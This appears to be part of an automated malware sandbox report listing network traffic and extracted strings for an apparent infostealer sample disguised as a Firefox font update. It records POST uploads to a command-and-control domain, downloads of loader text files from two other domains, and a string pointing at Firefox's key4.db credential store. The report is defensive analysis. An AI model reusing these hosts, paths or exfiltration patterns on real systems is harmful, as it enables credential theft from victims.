            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49750 -> 172.67.169.205:443
            Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: hungrypaster.click
            Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 77Host: hungrypaster.click
            Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=TIISHQNJAG16259AJUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 18155Host: hungrypaster.click
            Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=QYR7YRM38GD4I3YU5User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8776Host: hungrypaster.click
            Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=MFV3S0UO4HZAUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20399Host: hungrypaster.click
            Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=BDDN9MUYUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1193Host: hungrypaster.click
            Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=IV5EB92934TXGICS6XUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1123Host: hungrypaster.click
            Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 112Host: hungrypaster.click
            Source: global trafficHTTP traffic detected: GET /sdgjyut/psh.txt HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: neqi.shop
            Source: global trafficHTTP traffic detected: GET /int_clp_ldr_sha.txt HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: kliptizq.shop
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comCode function: 11_2_002DD889 InternetReadFile,SetEvent,GetLastError,SetEvent,11_2_002DD889
            Source: global trafficHTTP traffic detected: GET /sdgjyut/psh.txt HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: neqi.shop
            Source: global trafficHTTP traffic detected: GET /int_clp_ldr_sha.txt HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: kliptizq.shop
            Source: global trafficDNS traffic detected: DNS query: PvXlInYKrSNwyXWSA.PvXlInYKrSNwyXWSA
            Source: global trafficDNS traffic detected: DNS query: hungrypaster.click
            Source: global trafficDNS traffic detected: DNS query: neqi.shop
            Source: global trafficDNS traffic detected: DNS query: kliptizq.shop
            Source: unknownHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: hungrypaster.click
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Tue, 24 Dec 2024 00:34:18 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeX-Frame-Options: SAMEORIGINReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=vwFdg4fgzq3zjggU7TCdcN%2BhanT5h9f%2FMI0NiQkIvLm%2FKI5zDYk5X4Y6kZdxLrj57n8WVjGPgcVFzWJ5XJLfT6qB0O7W%2B0MhuyL20q%2BT7asSbDUVc4zvtUhZ%2FmvZS53p"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8f6c8140d9e27288-EWR
            Source: Setup.exeString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
            Source: Hc.com, 0000000B.00000003.2089519019.0000000004479000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
            Source: Hc.com, 0000000B.00000003.2089519019.0000000004479000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
            Source: Setup.exeString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
            Source: Setup.exeString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
            Source: Setup.exeString found in binary or memory: http://cert.ssl.com/SSLcom-SubCA-EV-CodeSigning-RSA-4096-R3.cer0_
            Source: Hc.com, 0000000B.00000003.1997077230.0000000004817000.00000004.00000800.00020000.00000000.sdmp, Hc.com.1.dr, Fw.8.drString found in binary or memory: http://crl.globalsign.com/ca/gstsacasha384g4.crl0
            Source: Hc.com, 0000000B.00000003.1997077230.0000000004817000.00000004.00000800.00020000.00000000.sdmp, Hc.com.1.dr, Fw.8.drString found in binary or memory: http://crl.globalsign.com/gscodesignsha2g3.crl0
            Source: Hc.com, 0000000B.00000003.1997077230.0000000004817000.00000004.00000800.00020000.00000000.sdmp, Hc.com.1.dr, Fw.8.drString found in binary or memory: http://crl.globalsign.com/root-r3.crl0G
            Source: Hc.com, 0000000B.00000003.1997077230.0000000004817000.00000004.00000800.00020000.00000000.sdmp, Hc.com.1.dr, Fw.8.drString found in binary or memory: http://crl.globalsign.com/root-r3.crl0c
            Source: Hc.com, 0000000B.00000003.1997077230.0000000004817000.00000004.00000800.00020000.00000000.sdmp, Hc.com.1.dr, Fw.8.drString found in binary or memory: http://crl.globalsign.com/root-r6.crl0G
            Source: powershell.exe, 00000012.00000002.2255979594.0000000007896000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.microb
            Source: Hc.com, 0000000B.00000003.2089519019.0000000004479000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
            Source: Setup.exeString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
            Source: Hc.com, 0000000B.00000003.2089519019.0000000004479000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
            Source: Hc.com, 0000000B.00000003.2089519019.0000000004479000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
            Source: Setup.exeString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
            Source: Setup.exeString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
            Source: Hc.com, 0000000B.00000003.2089519019.0000000004479000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
            Source: Setup.exeString found in binary or memory: http://crls.ssl.com/SSLcom-RootCA-EV-RSA-4096-R2.crl0
            Source: Setup.exeString found in binary or memory: http://crls.ssl.com/SSLcom-SubCA-EV-CodeSigning-RSA-4096-R3.crl0
            Source: Hc.com, 0000000B.00000003.2089519019.0000000004479000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
            Source: Setup.exeString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
            Source: powershell.exe, 00000010.00000002.2338815956.0000000006038000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
            Source: Hc.com, 0000000B.00000003.2089519019.0000000004479000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
            Source: Setup.exeString found in binary or memory: http://ocsp.digicert.com0A
            Source: Setup.exeString found in binary or memory: http://ocsp.digicert.com0C
            Source: Setup.exeString found in binary or memory: http://ocsp.digicert.com0X
            Source: Hc.com, 0000000B.00000003.1997077230.0000000004817000.00000004.00000800.00020000.00000000.sdmp, Hc.com.1.dr, Fw.8.drString found in binary or memory: http://ocsp.globalsign.com/ca/gstsacasha384g40C
            Source: Hc.com, 0000000B.00000003.2089519019.0000000004479000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
            Source: Hc.com, 0000000B.00000003.1997077230.0000000004817000.00000004.00000800.00020000.00000000.sdmp, Hc.com.1.dr, Fw.8.drString found in binary or memory: http://ocsp2.globalsign.com/gscodesignsha2g30V
            Source: Hc.com, 0000000B.00000003.1997077230.0000000004817000.00000004.00000800.00020000.00000000.sdmp, Hc.com.1.dr, Fw.8.drString found in binary or memory: http://ocsp2.globalsign.com/rootr306
            Source: Hc.com, 0000000B.00000003.1997077230.0000000004817000.00000004.00000800.00020000.00000000.sdmp, Hc.com.1.dr, Fw.8.drString found in binary or memory: http://ocsp2.globalsign.com/rootr606
            Source: Setup.exeString found in binary or memory: http://ocsps.ssl.com0
            Source: powershell.exe, 00000010.00000002.2334301446.0000000005126000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
            Source: powershell.exe, 00000010.00000002.2334301446.0000000005126000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
            Source: powershell.exe, 00000010.00000002.2334301446.0000000004FD1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2254156807.0000000005141000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
            Source: powershell.exe, 00000010.00000002.2334301446.0000000005126000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
            Source: Hc.com, 0000000B.00000003.1997077230.0000000004817000.00000004.00000800.00020000.00000000.sdmp, Hc.com.1.dr, Fw.8.drString found in binary or memory: http://secure.globalsign.com/cacert/gscodesignsha2g3ocsp.crt08
            Source: Hc.com, 0000000B.00000003.1997077230.0000000004817000.00000004.00000800.00020000.00000000.sdmp, Hc.com.1.dr, Fw.8.drString found in binary or memory: http://secure.globalsign.com/cacert/gstsacasha384g4.crt0
            Source: powershell.exe, 00000010.00000002.2334301446.0000000005126000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
            Source: Hc.com, 0000000B.00000002.2323612847.0000000000335000.00000002.00000001.01000000.00000007.sdmp, Hc.com, 0000000B.00000003.1997077230.0000000004817000.00000004.00000800.00020000.00000000.sdmp, Hc.com.1.dr, Developers.8.drString found in binary or memory: http://www.autoitscript.com/autoit3/X
            Source: Setup.exeString found in binary or memory: http://www.ssl.com/repository/SSLcom-RootCA-EV-RSA-4096-R2.crt0
            Source: Hc.com, 0000000B.00000003.2089519019.0000000004479000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.c.lencr.org/0
            Source: Hc.com, 0000000B.00000003.2089519019.0000000004479000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.i.lencr.org/0
            Source: Hc.com, 0000000B.00000003.2044585816.0000000004464000.00000004.00000800.00020000.00000000.sdmp, Hc.com, 0000000B.00000003.2043897088.000000000447A000.00000004.00000800.00020000.00000000.sdmp, Hc.com, 0000000B.00000003.2044209015.0000000004464000.00000004.00000800.00020000.00000000.sdmp, Hc.com, 0000000B.00000003.2043959982.0000000004463000.00000004.00000800.00020000.00000000.sdmp, Hc.com, 0000000B.00000003.2044421982.0000000004464000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
            Source: powershell.exe, 00000010.00000002.2334301446.0000000004FD1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2254156807.0000000005141000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lBdq
            Source: powershell.exe, 00000010.00000002.2334301446.0000000005126000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/winsvr-2022-pshelp
            Source: powershell.exe, 00000010.00000002.2334301446.000000000593A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2334301446.0000000005957000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/winsvr-2022-pshelphZ
            Source: Hc.com, 0000000B.00000003.2044585816.0000000004464000.00000004.00000800.00020000.00000000.sdmp, Hc.com, 0000000B.00000003.2043897088.000000000447A000.00000004.00000800.00020000.00000000.sdmp, Hc.com, 0000000B.00000003.2044209015.0000000004464000.00000004.00000800.00020000.00000000.sdmp, Hc.com, 0000000B.00000003.2043959982.0000000004463000.00000004.00000800.00020000.00000000.sdmp, Hc.com, 0000000B.00000003.2044421982.0000000004464000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
            Source: Hc.com, 0000000B.00000003.2044585816.0000000004464000.00000004.00000800.00020000.00000000.sdmp, Hc.com, 0000000B.00000003.2043897088.000000000447A000.00000004.00000800.00020000.00000000.sdmp, Hc.com, 0000000B.00000003.2044209015.0000000004464000.00000004.00000800.00020000.00000000.sdmp, Hc.com, 0000000B.00000003.2043959982.0000000004463000.00000004.00000800.00020000.00000000.sdmp, Hc.com, 0000000B.00000003.2044421982.0000000004464000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
            Source: Hc.com, 0000000B.00000003.2044585816.0000000004464000.00000004.00000800.00020000.00000000.sdmp, Hc.com, 0000000B.00000003.2043897088.000000000447A000.00000004.00000800.00020000.00000000.sdmp, Hc.com, 0000000B.00000003.2044209015.0000000004464000.00000004.00000800.00020000.00000000.sdmp, Hc.com, 0000000B.00000003.2043959982.0000000004463000.00000004.00000800.00020000.00000000.sdmp, Hc.com, 0000000B.00000003.2044421982.0000000004464000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
            Source: powershell.exe, 00000010.00000002.2338815956.0000000006038000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
            Source: powershell.exe, 00000010.00000002.2338815956.0000000006038000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
            Source: powershell.exe, 00000010.00000002.2338815956.0000000006038000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
            Source: Hc.com, 0000000B.00000003.2044585816.0000000004464000.00000004.00000800.00020000.00000000.sdmp, Hc.com, 0000000B.00000003.2043897088.000000000447A000.00000004.00000800.00020000.00000000.sdmp, Hc.com, 0000000B.00000003.2044209015.0000000004464000.00000004.00000800.00020000.00000000.sdmp, Hc.com, 0000000B.00000003.2043959982.0000000004463000.00000004.00000800.00020000.00000000.sdmp, Hc.com, 0000000B.00000003.2044421982.0000000004464000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
            Source: Hc.com, 0000000B.00000003.2044585816.0000000004464000.00000004.00000800.00020000.00000000.sdmp, Hc.com, 0000000B.00000003.2043897088.000000000447A000.00000004.00000800.00020000.00000000.sdmp, Hc.com, 0000000B.00000003.2044209015.0000000004464000.00000004.00000800.00020000.00000000.sdmp, Hc.com, 0000000B.00000003.2043959982.0000000004463000.00000004.00000800.00020000.00000000.sdmp, Hc.com, 0000000B.00000003.2044421982.0000000004464000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
            Source: Hc.com, 0000000B.00000003.2044585816.0000000004464000.00000004.00000800.00020000.00000000.sdmp, Hc.com, 0000000B.00000003.2043897088.000000000447A000.00000004.00000800.00020000.00000000.sdmp, Hc.com, 0000000B.00000003.2044209015.0000000004464000.00000004.00000800.00020000.00000000.sdmp, Hc.com, 0000000B.00000003.2043959982.0000000004463000.00000004.00000800.00020000.00000000.sdmp, Hc.com, 0000000B.00000003.2044421982.0000000004464000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
            Source: powershell.exe, 00000010.00000002.2334301446.0000000005126000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
            Source: Hc.com, 0000000B.00000003.2067214936.00000000043A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://hungrypaster.click/
            Source: Hc.com, 0000000B.00000002.2324659198.0000000004363000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://hungrypaster.click/api
            Source: Hc.com, 0000000B.00000002.2324057509.0000000001873000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://hungrypaster.click:443/api
            Source: Hc.com, 0000000B.00000002.2324057509.0000000001873000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://hungrypaster.click:443/api.default-release/key4.dbPK
            Source: Hc.com, 0000000B.00000002.2324057509.0000000001873000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://hungrypaster.click:443/api3r78r106r115r115r112r115r43r69r106r103r103r102r115r102r111r100r102
            Source: Hc.com, 0000000B.00000002.2324057509.0000000001873000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://hungrypaster.click:443/apitPK
            Source: Hc.com, 0000000B.00000002.2324659198.0000000004363000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://kliptizq.shop/
            Source: Hc.com, 0000000B.00000002.2324659198.0000000004363000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://kliptizq.shop/(W#
            Source: Hc.com, 0000000B.00000002.2324271859.0000000001A3F000.00000004.00000020.00020000.00000000.sdmp, Hc.com, 0000000B.00000002.2324659198.0000000004363000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://kliptizq.shop/int_clp_ldr_sha.txt
            Source: Hc.com, 0000000B.00000002.2324057509.0000000001873000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://kliptizq.shop:443/int_clp_ldr_sha.txt
            Source: Hc.com, 0000000B.00000002.2324659198.0000000004363000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://neqi.shop/
            Source: Hc.com, 0000000B.00000002.2324659198.0000000004363000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://neqi.shop/BJ
            Source: Hc.com, 0000000B.00000002.2324659198.0000000004363000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://neqi.shop/sdgjyut/psh.txt
            Source: Hc.com, 0000000B.00000002.2324659198.0000000004363000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://neqi.shop/sdgjyut/psh.txtk
            Source: Hc.com, 0000000B.00000002.2324147573.00000000019D8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://neqi.shop/sdgjyut/psh.txto
            Source: Hc.com, 0000000B.00000002.2324057509.0000000001873000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://neqi.shop:443/sdgjyut/psh.txt
            Source: powershell.exe, 00000010.00000002.2338815956.0000000006038000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
            Source: Hc.com, 0000000B.00000003.2044510092.00000000044A9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.microsof
            Source: Hc.com, 0000000B.00000003.2090598072.0000000005C67000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
            Source: Hc.com, 0000000B.00000003.2090598072.0000000005C67000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
            Source: Hc.com, 0000000B.00000003.2066793875.00000000044A0000.00000004.00000800.00020000.00000000.sdmp, Hc.com, 0000000B.00000003.2044585816.00000000044A0000.00000004.00000800.00020000.00000000.sdmp, Hc.com, 0000000B.00000003.2044510092.00000000044A7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
            Source: Hc.com, 0000000B.00000003.2044585816.000000000447B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples
            Source: Hc.com, 0000000B.00000003.2066793875.00000000044A0000.00000004.00000800.00020000.00000000.sdmp, Hc.com, 0000000B.00000003.2044585816.00000000044A0000.00000004.00000800.00020000.00000000.sdmp, Hc.com, 0000000B.00000003.2044510092.00000000044A7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
            Source: Hc.com, 0000000B.00000003.2044585816.000000000447B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install
            Source: Hc.com, 0000000B.00000003.1997077230.0000000004817000.00000004.00000800.00020000.00000000.sdmp, Hc.com.1.dr, Fw.8.drString found in binary or memory: https://www.autoitscript.com/autoit3/
            Source: powershell.exe, 00000012.00000002.2254156807.00000000053F6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2253287573.000000000324C000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2253165533.00000000030A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.cloudflare.com/5xx-error-landing
            Source: powershell.exe, 00000012.00000002.2254156807.00000000054F3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.cloudflare.com/5xx-error-landinghZ
            Source: powershell.exe, 00000012.00000002.2253287573.00000000032EC000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2253980772.0000000004C70000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2253484959.0000000003337000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2253787168.0000000003510000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2253287573.000000000324C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.cloudflare.com/5xx-error-landingid=brand_linktarget=_blank
            Source: powershell.exe, 00000012.00000002.2253287573.000000000327F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.cloudflare.com/5xx-error-landingmanceY
            Source: powershell.exe, 00000012.00000002.2254156807.00000000054F3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.cloudflare.com/learning/access-management/phish
            Source: powershell.exe, 00000012.00000002.2254156807.00000000054F3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.cloudflare.com/learning/access-management/phishhZ
            Source: powershell.exe, 00000012.00000002.2254156807.00000000054F3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.cloudflare.com/learning/access-management/phishing-atX)
            Source: powershell.exe, 00000012.00000002.2254156807.00000000053F6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2253287573.000000000324C000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2253165533.00000000030A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.cloudflare.com/learning/access-management/phishing-attack/
            Source: powershell.exe, 00000012.00000002.2253287573.00000000032EC000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2253980772.0000000004C70000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2253484959.0000000003337000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2253787168.0000000003510000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2253287573.000000000324C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.cloudflare.com/learning/access-management/phishing-attack/class=cf-btnstyle=background-c
            Source: Hc.com, 0000000B.00000003.2044585816.0000000004464000.00000004.00000800.00020000.00000000.sdmp, Hc.com, 0000000B.00000003.2043897088.000000000447A000.00000004.00000800.00020000.00000000.sdmp, Hc.com, 0000000B.00000003.2044209015.0000000004464000.00000004.00000800.00020000.00000000.sdmp, Hc.com, 0000000B.00000003.2043959982.0000000004463000.00000004.00000800.00020000.00000000.sdmp, Hc.com, 0000000B.00000003.2044421982.0000000004464000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
            Source: Fw.8.drString found in binary or memory: https://www.globalsign.com/repository/0
            Source: Hc.com, 0000000B.00000003.2044585816.0000000004464000.00000004.00000800.00020000.00000000.sdmp, Hc.com, 0000000B.00000003.2043897088.000000000447A000.00000004.00000800.00020000.00000000.sdmp, Hc.com, 0000000B.00000003.2044209015.0000000004464000.00000004.00000800.00020000.00000000.sdmp, Hc.com, 0000000B.00000003.2043959982.0000000004463000.00000004.00000800.00020000.00000000.sdmp, Hc.com, 0000000B.00000003.2044421982.0000000004464000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
            Source: Hc.com, 0000000B.00000003.2090598072.0000000005C67000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.VsJpOAWrHqB2
            Source: Hc.com, 0000000B.00000003.2090598072.0000000005C67000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.n0g9CLHwD9nR
            Source: Hc.com, 0000000B.00000003.2090598072.0000000005C67000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
            Source: Hc.com, 0000000B.00000003.2090598072.0000000005C67000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
            Source: Hc.com, 0000000B.00000003.2090598072.0000000005C67000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
            Source: Setup.exeString found in binary or memory: https://www.ssl.com/repository0
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49751
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49750
            Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49748 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49751 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49749
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49748
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49747
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49746
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
            Source: unknownHTTPS traffic detected: 188.114.97.6:443 -> 192.168.2.4:49742 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 188.114.97.6:443 -> 192.168.2.4:49743 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 188.114.97.6:443 -> 192.168.2.4:49744 version: TLS 1.2
